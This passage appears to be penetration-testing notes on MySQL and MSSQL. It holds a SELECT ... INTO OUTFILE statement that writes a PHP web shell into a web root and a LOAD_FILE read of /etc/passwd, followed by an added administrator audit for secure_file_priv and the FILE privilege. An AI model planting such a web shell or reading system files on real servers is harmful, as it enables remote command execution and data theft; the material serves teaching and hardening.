Linux

mysql -u $USER -p$PWD -h $IP

Windows

sqlcmd -S SRVMSSQL -U $USER -P $PWD -y 30 -Y 30

Write Local Files

MySQL does not have a stored procedure like xp_cmdshell, but we can achieve command execution if we can write a file to a location on the file system from which it will be executed, such as a web server's document root.

In MySQL, a global system variable secure_file_priv limits the effect of data import and export operations, such as those performed by the LOAD DATA and SELECT ... INTO OUTFILE statements and the LOAD_FILE() function. These operations are permitted only to users who have the FILE privilege.

SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php';

secure_file_priv

In the example below, the variable is empty, which means we can read and write data using MySQL:

mysql> show variables like "secure_file_priv";

+------------------+-------+
| Variable_name    | Value |
+------------------+-------+
| secure_file_priv |       |
+------------------+-------+

Read Local Files

By default, a MySQL installation does not allow arbitrary file reads, but if the correct settings are in place and we have the appropriate privileges, we can read files using the following method:

mysql> select LOAD_FILE("/etc/passwd");
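
The file read and write techniques above depend on two things: the value of secure_file_priv and which accounts hold the FILE privilege. The following audit is an added example, not part of the original notes; it is meant to be run by an administrator, and the account name 'app_user'@'localhost' and the directory path are placeholders.

```sql
-- 1. Interpret the current secure_file_priv value.
--    NULL         : import/export operations are disabled
--    empty string : no restriction, any path the mysqld OS user can reach
--    a directory  : operations are limited to files in that directory
SELECT @@GLOBAL.secure_file_priv AS secure_file_priv,
       CASE
         WHEN @@GLOBAL.secure_file_priv IS NULL THEN 'OK: import/export disabled'
         WHEN @@GLOBAL.secure_file_priv = ''    THEN 'RISK: unrestricted file read/write'
         ELSE 'RESTRICTED: limited to the listed directory'
       END AS assessment;

-- 2. List every account that holds the global FILE privilege.
--    Run as an administrative account; a low-privileged user only
--    sees its own rows in this view.
SELECT GRANTEE, IS_GRANTABLE
FROM information_schema.USER_PRIVILEGES
WHERE PRIVILEGE_TYPE = 'FILE'
ORDER BY GRANTEE;

-- 3. Remove FILE from accounts that do not need it
--    (placeholder account name, replace with a grantee from step 2).
REVOKE FILE ON *.* FROM 'app_user'@'localhost';

-- 4. secure_file_priv is read-only at runtime, so change it in the
--    server option file and restart mysqld (placeholder path):
--      [mysqld]
--      secure_file_priv = /var/lib/mysql-files
--    Keep that directory outside any web root and writable only by
--    the mysqld OS user.

-- 5. Verify after the restart. With the restriction in place:
--    SELECT ... INTO OUTFILE to a path outside the directory fails with
--      ERROR 1290 (HY000): The MySQL server is running with the
--      --secure-file-priv option so it cannot execute this statement
--    and LOAD_FILE() on a path outside the directory returns NULL.
SHOW VARIABLES LIKE 'secure_file_priv';
```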